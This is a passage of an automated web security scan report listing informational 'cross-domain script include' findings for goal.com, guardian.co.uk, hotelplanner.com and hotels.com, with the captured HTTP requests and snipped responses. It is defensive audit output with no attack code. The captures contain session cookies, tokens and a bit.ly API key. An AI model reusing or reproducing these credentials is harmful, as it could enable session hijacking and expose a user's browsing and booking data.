User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1479357280-1317599429942; __utma=167609825.336600251.1317599442.1317599442.1317599442.1; __utmb=167609825.1.10.1317599442; __utmc=167609825; __utmz=167609825.1317599442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _em_hl=1; _em_vt=6b3bfb104abb2666e789b9e202024e62e18088e413-981323754e88f8d5; _em_v=cf9911b66e4d49b949eaf13bd6fa4e88f8d57af834-210214684e88f8d5

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=0,must-revalidate,s-maxage=300
Content-Language: en
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Oct 2011 23:59:09 GMT
Expires: Sat, 01 Oct 2011 23:58:44 +0000
Last-Modified: Sun, 02 Oct 2011 23:58:44 GMT
Server: ECS (sjo/522B)
Vary: Accept-Encoding
X-Cache: HIT
X-Goal-Flavors: ad970x40navbar,epleague
Content-Length: 91057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<![endif]-->
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
<script src="//connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<script type="text/javascript" src="http://bit.ly/javascript-api.js?version=latest&amp;login=goalsoccer1&amp;apiKey=R_b977ffa1ea5feaaa7ba8bc44cf805e2c"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://medrx.sensis.com.au/images/sensis/goal/util.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=goal"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div id="social_twitter-badge">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Insight Tracking --><script type="text/javascript" defer="defer" src="http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js?pc=7743/12359"></script>

<!-- Begin LotaMe Tag -->
<script type="text/javascript" src="http://tags.crwdcntrl.net/c/412/cc.js"></script>
...[SNIP]...
<!-- Pixazza image advertisements --><script type="text/javascript" src="http://www.pixazza.com/widget/53d1ac1014/"></script>
...[SNIP]...
20.56. http://www.goal.com/en/teams/england/97/man-utd-news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goal.com
Path:   /en/teams/england/97/man-utd-news

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/teams/england/97/man-utd-news HTTP/1.1
Host: www.goal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=0,must-revalidate,s-maxage=600
Content-Language: en
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Oct 2011 23:51:58 GMT
Expires: Sat, 01 Oct 2011 23:46:14 +0000
Last-Modified: Sun, 02 Oct 2011 23:46:14 GMT
Server: ECS (sjo/523B)
Vary: Accept-Encoding
X-Cache: HIT
X-Goal-Flavors: ad970x40navbar,turkishair,epleague
Content-Length: 155925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">
<head>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://medrx.sensis.com.au/images/sensis/goal/util.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://static.eplayer.performgroup.com/flash/js/swfobject.js"></script>
<script type="text/javascript" src="http://static.eplayer.performgroup.com/flash/js/performgroup.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Insight Tracking --><script type="text/javascript" defer="defer" src="http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js?pc=7743/12359"></script>

<!-- Begin LotaMe Tag -->
<script type="text/javascript" src="http://tags.crwdcntrl.net/c/412/cc.js"></script>
...[SNIP]...
<!-- Pixazza image advertisements --><script type="text/javascript" src="http://www.pixazza.com/widget/53d1ac1014/"></script>
...[SNIP]...
20.57. http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /football/2011/sep/27/manchester-united-basel-live

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /football/2011/sep/27/manchester-united-basel-live HTTP/1.1
Host: www.guardian.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; s_pers=%20s_lv%3D1317599402360%7C1412207402360%3B%20s_lv_s%3DFirst%2520Visit%7C1317601202360%3B%20s_visit%3D1%7C1317601202363%3B%20c_dl%3D1%7C1317601202366%3B%20s_ev36_persist%3DDirect%2520Load%7C1318204202383%3B%20s_37_persist%3DDirect%2520Load%7C1318204202395%3B%20s_ev40%3D%255B%255B'Direct%252520Load'%252C'1317599402404'%255D%255D%7C1475452202404%3B%20gpv_pageName%3DManchester%2520United%253AKeyword%2520Page%253A589863%7C1317601202406%3B%20s_nr%3D1317599402415-New%7C1349135402415%3B; s_vi=[CS]v1|27447C5685010C0B-4000010320138FC1[CE]; OAX=Mhd7ak6I+K0ABUJY; OAX_tmp=4d686437616b36492b4b304142554a59; _publishflow=4galn0lq98x95vrg; member_type=0; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B%20s_ppv%3D27%3B; GU_ST=; rsi_segs=

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:57:55 GMT
Server: Apache
X-GU-jas: 54-23155
X-GU-PageRenderer: Hypercharger
Content-Type: text/html; charset=UTF-8
Set-Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; path=/; domain=.guardian.co.uk; expires=Sun, 23-Oct-2011 23:57:55 GMT
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 52
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Content-Length: 121369
Connection: close


<!DOCTYPE html><html lang="en">

<head>
                <script type="text/javascript" >
document.domain = "guardian.co.uk";

...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.guim.co.uk/static/32b9600ebe43926107624a816c7870f8566f154f/common/styles/article-page-typography.css" media="screen" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://static.guim.co.uk/static/32b9600ebe43926107624a816c7870f8566f154f/common/external-scripts/jquery-libraries/jquery.cookie.js"></script>
<script type="text/javascript" src="http://static.guim.co.uk/static/32b9600ebe43926107624a816c7870f8566f154f/common/external-scripts/jquery-libraries/jquery.writeCapture-1.0.5-min.js"></script>
...[SNIP]...
</script>
<script src="http://static.guim.co.uk/static/32b9600ebe43926107624a816c7870f8566f154f/common/scripts/gu-core.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://combo.guim.co.uk/32b9600ebe43926107624a816c7870f8566f154f/common/scripts/convertJSONtoAd+common/scripts/formChecker+common/scripts/glossaryPopupView+common/scripts/sendtoafriend+common/scripts/shareCounts+common/scripts/timestampPermalink+common/scripts/tweet_button.js"></script>
<script type="text/javascript" src="http://combo.guim.co.uk/32b9600ebe43926107624a816c7870f8566f154f/m-87~js/simplelightbox+m-87~js/simplelightbox-init.js"></script>
...[SNIP]...
20.58. http://www.guardian.co.uk/football/manchester-united  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /football/manchester-united

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /football/manchester-united HTTP/1.1
Host: www.guardian.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:53 GMT
Server: Apache
X-GU-jas: 57-21851
X-GU-PageRenderer: Hypercharger
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 52
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Content-Length: 91378
Connection: close


<!DOCTYPE html><html lang="en">

<head>

                <script type="text/javascript" >
document.domain = "guardian.co.uk";
...[SNIP]...
tp://combo.guim.co.uk/32b9600ebe43926107624a816c7870f8566f154f/m-482~public/css/jobs-box-4+m-661~static/1735/comment-counts+m-87~styles/simplelightbox+m-87~styles/twitter-app.css" media="screen" />
   
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://static.guim.co.uk/static/32b9600ebe43926107624a816c7870f8566f154f/common/external-scripts/jquery-libraries/jquery.cookie.js"></script>
<script type="text/javascript" src="http://static.guim.co.uk/static/32b9600ebe43926107624a816c7870f8566f154f/common/external-scripts/jquery-libraries/jquery.writeCapture-1.0.5-min.js"></script>
...[SNIP]...
</script>
<script src="http://static.guim.co.uk/static/32b9600ebe43926107624a816c7870f8566f154f/common/scripts/gu-core.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://combo.guim.co.uk/32b9600ebe43926107624a816c7870f8566f154f/common/scripts/convertJSONtoAd.js"></script>
<script type="text/javascript" src="http://combo.guim.co.uk/32b9600ebe43926107624a816c7870f8566f154f/m-661~static/1735/fill-comment-counts+m-87~js/simplelightbox+m-87~js/simplelightbox-init.js"></script>
...[SNIP]...
</div> <script type='text/javascript' src='http://static.eplayer.performgroup.com/flash/js/swfobject.js'></script><script type='text/javascript' src='http://static.eplayer.performgroup.com/flash/js/performgroup.js'></script>
...[SNIP]...
20.59. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:29:43 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 229491

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Hotel Availability - Millennium Bostonian Hotel Boston</title>
       <meta http-equiv="Content-Type" content="t
...[SNIP]...
</script>
       <script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</script>
   
<script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?v=3&sensor=false&language=en"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
20.60. http://www.hotelplanner.com/Search/Index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:10:06 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:10:06 GMT;path=/
Vary: Accept-Encoding
Content-Length: 225194


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
</script>
       <script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
20.61. https://www.hotelplanner.com/Accept/Reserve.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:30:37 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58824

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<td valign="top" colspan="2" align="center">
   <script src=https://seal.verisign.com/getseal?host_name=WWW.HOTELPLANNER.COM&size=S&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...
20.62. http://www.hotels.com/hotel/details.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:28:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=H7gAAAAAAAIAAAAAAAAAAAAAAAYAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:28:19 GMT
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:28:19 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:19 GMT; Path=/
Content-Length: 238921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
<td width="135" align="right" valign="top">
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.hotels.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js" async="true"></script>
...[SNIP]...
20.63. http://www.hotels.com/search.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /search.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
